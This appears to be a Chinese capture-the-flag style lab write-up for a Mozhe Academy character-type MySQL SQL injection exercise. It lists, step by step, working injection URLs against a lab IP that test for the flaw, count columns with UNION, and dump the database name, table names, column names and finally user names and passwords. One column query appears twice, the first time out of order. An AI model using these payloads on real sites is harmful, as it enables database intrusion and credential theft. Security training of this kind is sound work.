声明

环境
墨者学院-SQL手工注入漏洞测试(MySQL数据库-字符型)
判断是否存在漏洞
http://124.70.64.48:42937/new_list.php?id=tingjigonggao' and '1'='1'--+ 

and '1'='1'正常
http://124.70.64.48:42937/new_list.php?id=tingjigonggao' and '1'='2'--+ 

and '1'='2'出错；与 and '1'='1' 时的结果不同，说明 id 参数的值被直接拼接进 SQL 语句的单引号字符串中，存在字符型注入漏洞
判断字段数
http://124.70.64.48:42937/new_list.php?id=1' union select 1,2,3,4 --+ 
根据 union select 1,2,3,4 的返回结果，字段数判断为4
爆数据库
http://124.70.64.48:42937/new_list.php?id=1' union select 1,2,database(),4 --+ 
爆出数据库mozhe_discuz_stormgroup
http://124.70.64.48:42937/new_list.php?id=1' union select 1,2,group_concat(column_name),4 from information_schema.columns where table_name = 'stormgroup_member'--+ 
爆表
http://124.70.64.48:42937/new_list.php?id=1' union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema = 'mozhe_discuz_stormgroup'--+ 
爆出数据表 notice 和 stormgroup_member，分析后判断 stormgroup_member 表包含账号密码

爆字段
http://124.70.64.48:42937/new_list.php?id=1' union select 1,2,group_concat(column_name),4 from information_schema.columns where table_name = 'stormgroup_member'--+ 
爆出表stormgroup_member的所有字段id、name、password、status

爆数据
http://124.70.64.48:42937/new_list.php?id=1' union select 1,2,group_concat(id,',',name,',',password),4 from stormgroup_member where id=1--+ 



















